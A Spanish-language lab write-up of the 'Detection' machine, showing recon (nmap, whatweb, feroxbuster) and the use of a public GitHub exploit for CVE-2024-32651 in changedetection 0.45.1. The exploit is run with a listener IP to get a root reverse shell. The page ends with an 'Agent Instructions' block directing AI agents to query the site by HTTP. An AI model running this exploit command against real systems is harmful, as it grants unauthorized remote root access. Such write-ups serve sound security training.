# MAQUINA DETECTION (WEB 'changedetection' port 5000 + VULN RCE 'changedetection RCE')

Realice un escaneo de puertos con NMAP.

`nmap -A --min-rate 3000 -Pn 192.168.163.97 -oN Basicscan.txt`

![](/files/llwe2Lwp65LShWZ1lABJ)

Puertos abiertos 22 ssh y 5000 http

Puerto 5000 http >> http-title "Change Detection" .

Use whatweb para ver las tecnologías de la web.

`whatweb` [`http://192.168.163.97:5000`](http://192.168.163.97:5000/)

![](/files/yFE6bhmN8hONheniUMXJ)

Pase a hacer un reconocimiento de la pagina web.

![](/files/2q7vXNDMfMo4BmFV01z1)

Con feroxbuster realice una búsqueda de directorios ocultos.

![](/files/2cosl5xtyRC4KEOonCVR)

![](/files/L4ZWuUCRXiRbtGIsthdf)

En su lado derecho puedo ver una versión de la aplicación web changedetecion > v 0.45.1

![](/files/ateKXZmftGn3kiH2yx5u)

Con la herramienta searchsploit encontré un exploit para esta versión.

`searchsploit 'change detection'`

![](/files/XSqJGAA40MAKB2AMJcWT)

Al verificar que tiene una vulnerabilidad RCE, busque en google otro exploit en github encontrando lo siguiente.

<https://github.com/s0ck3t-s3c/CVE-2024-32651-changedetection-RCE.git>

![](/files/PVwKS0PW1DVGQANKxFTb)

Utilice la prueba de concepto de este exploit para poder ejecutarlo. En otra terminal me puse a la escucha con netcat.

`python3 exploit.py --url` [`http://192.168.163.97:5000`](http://192.168.163.97:5000/) `--port 80 --ip 192.168.45.159`

![](/files/EOJhbbrOtfprk8id1cMH)

Una vez que ejecute el exploit logre el acceso remoto a la maquina como usuario root.

![](/files/CZB4Qy0y68tkRLbQwh3P)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://1gnotus.gitbook.io/ignotus_pwn/proving-ground-practice-and-play/writeup/maquina-detection-web-changedetection-port-5000-+-vuln-rce-changedetection-rce.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.